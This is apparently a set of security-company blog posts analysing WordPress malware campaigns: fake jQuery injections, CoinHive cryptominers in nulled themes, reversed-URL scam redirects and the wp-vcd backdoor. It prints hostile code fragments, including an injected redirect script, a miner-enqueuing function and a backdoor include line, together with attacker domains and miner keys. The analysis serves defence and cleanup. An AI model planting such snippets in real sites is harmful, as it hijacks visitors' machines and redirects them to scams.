Fake Wp.org/jquery.js

There is a long-lasting malware campaign (dating back to at least 2016) that injects fake jQuery scripts:

<script type="text/javascript" src="hxxps://www.XX[X]wp[.]org/jquery.js"></script>

Where XX[X] are 2 or 3 random characters.

This Twitter thread mentions some of them:


We’ve compiled a longer list of the fake jQuery URLs employed by this campaign, along with numbers of websites PublicWWW currently finds them on:

  • www.9iwp[.]org/jquery.js - 6473
  • www.34wp[.]org/jquery.js - 2830
  • www.3vwp[.]org/jquery.js - 2552
  • www.7owp[.]org/jquery.js - 1248
  • www.57wp[.]org/jquery.js - 168
  • www.29wp[.]org/jquery.js - 115
  • www.j3wp[.]org/jquery.js - 85
  • www.i1wp[.]org/jquery.js - 51
  • www.i7wp[.]org/jquery.js - 17
  • www.x5wp[.]org/jquery.js - 12
  • www.i2wp[.]org/jquery.js - 8
  • www.35wp[.]org/jquery.js - 6
  • www.75wp[.]org/jquery.js - 4
  • www.10wp[.]org/jquery.js - 3
  • www.I0wp[.]org/jquery.js - 3
  • www.I3wp[.]org/jquery.js - 3
  • www.61wp[.]org/jquery.js - 3

Multi-Vector WordPress Infection from Examhome

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.>

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js,/b>.

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign. The location of the malware varies a lot. The more common versions of this malware can be found in .js files that have jquery in their names. Or they are injected into settings of vulnerable WordPress themes and plugins, for example, very old tagDiv themes (Newspaper, Newsmag and their derivatives) or unpatched Smart Google Code Inserter plugin.

JQuory: Cryptomining in Nulled Themes and Plugins.

Three months ago b>@ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below, is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );} 

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero

Nulled software is long known for coming with an undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about security and reputation of your websites.

Naive CoinHive Injections

Since CoinHive domain made it into many blacklists, attackers began avoiding linking to the hosted library file https://coinhive .com/lib/coinhive.min.js. Instead, they uploaded this file to third-party sites. Some of the attempts to get rid of the coinhive.com domain look pretty naive. For example, injecting the whole library code into web pages.


Yes! Some attackers inject all 60+ kilobytes of the CoinHive library into the HTML code of infected web pages. It is hard to miss when you visually inspect code of such pages. It was funny to find that in one case the attackers tried to renamed the miner variable into animation to make the code look more acceptable.

On another site, the library was injected into a web page in an obfuscated format that made it even bigger. Again, the attackers went an extra mile to make it look less suspicious. They added this comment

<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->

Authedmine.com - is a version of the CoinHive JavaScript miner that always asks permission to start mining thus considered an acceptable use of a Monero miner on a website. However in the above case, the obfuscated code was not from authedmine - it was the silent coinhive.com version. No wonder the site begins mining coins full speed without any notifications as soon as you open it.

And by the way, when you copy all the CoinHive library code (even obfuscated) to a third-party site it still makes requests to CoinHive domains, so it's easy to detect and block.

For articles about more sophisticated “cryptojacking” hacks please check our blog.

If your site is a victim of such attacks, we can help to clean and protect it.

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this

document.location​.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.phphxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.phphxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.phphxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need a professional help to clean and protect your site, you can count on us.

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top

<?php if (file_exists(dirname(FILE) . '/class.theme-modules.php')) include_once(dirname(FILE) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file that is included by the code added in the functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest malicious files.

The beginning of the file looks like this

<?php //install_code1error_reporting(0);ini_set('display_errors', 0);DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']);$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may be not that easy as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick posts about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few of interesting features that help obfuscate its true nature:

1. use of a non-dotted decimal notation for the host name: 3104709642(which translates to 185 .14 .28 .10)

  1. quite a common trick of using jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads the obfuscated version of the CoinHive library)

  2. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not version of the script injected to websites. It was an already decoded version of the malicious script. The original code looks like this

eval(function(p,​a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'​.split('|'),0,{​}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.